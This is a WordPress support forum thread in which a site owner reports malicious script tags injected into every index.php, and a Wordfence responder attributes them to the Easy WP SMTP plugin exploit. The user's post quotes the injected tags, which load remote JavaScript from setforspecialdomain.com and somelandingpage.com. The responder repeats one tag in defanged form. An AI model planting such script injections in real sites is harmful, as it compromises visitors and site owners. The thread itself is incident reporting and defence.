Title: setforspecialdomain hack
Last modified: April 22, 2019

---

# setforspecialdomain hack

 *  Resolved [dcormack](https://wordpress.org/support/users/dcormack/)
 * (@dcormack)
 * [7 years, 4 months ago](https://wordpress.org/support/topic/setforspecialdomain-hack/)
 * One of my sites has been riddled with java script in the WP files:
 * <script type=’text/javascript’ async src=’[https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&’></script><script](https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&’></script><script)
   type=’text/javascript’ async src=’[https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000′></script>&lt](https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000′></script>&lt);?
   php
 * Its overwritten every single index.php (there are quite a few but just looked
   with c-panel file manager – havent got filezilla on this workstation)
 * Nothing changed shown in mysql query so looks like its not changed the db tables
 * I cant find anyone else reporting this except the root index.php with this script
   and the url redirection in WP_options tables

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [wfdave](https://wordpress.org/support/users/wfdave/)
 * (@wfdave)
 * [7 years, 4 months ago](https://wordpress.org/support/topic/setforspecialdomain-hack/#post-11455812)
 * Hi [@dcormack](https://wordpress.org/support/users/dcormack/),
 * This seems to have been caused by the Easy WP SMTP plugin exploit.
 * [https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/](https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/)
 * This allowed attackers to edit the siteurl/homeurl within your wp_options table,
   and add malicious script tags into the `index.php`. The most telling sign was
   that it added the script tag which was described in the blog post:
 * `<script type='text/javascript' async src='hXXps://setforspecialdomain[.]com/
   in2herg42t2?type=in2&frm=scr&'></script>`
 * What you should do is do a clean install of WordPress, install Wordfence, and
   then any other plugins.
 * Dave
 *  [wfdave](https://wordpress.org/support/users/wfdave/)
 * (@wfdave)
 * [7 years, 4 months ago](https://wordpress.org/support/topic/setforspecialdomain-hack/#post-11455824)
 * Hi [@dcormack](https://wordpress.org/support/users/dcormack/),
 * I believe this was caused by the exploit found in the Easy WP SMTP plugin.
 * [https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/](https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/)
 * The most telling sign was that the attacker changed your site’s URL within the
   wp_options table, and added a script tag referencing `setforspecialdomain.com`.
 * What I would recommend is doing a clean install of WordPress, and then Wordfence/
   other plugins.
 * Dave

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘setforspecialdomain hack’ is closed to new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

 * 1 reply
 * 2 participants
 * Last reply from: [wfdave](https://wordpress.org/support/users/wfdave/)
 * Last activity: [7 years, 4 months ago](https://wordpress.org/support/topic/setforspecialdomain-hack/#post-11455824)
 * Status: resolved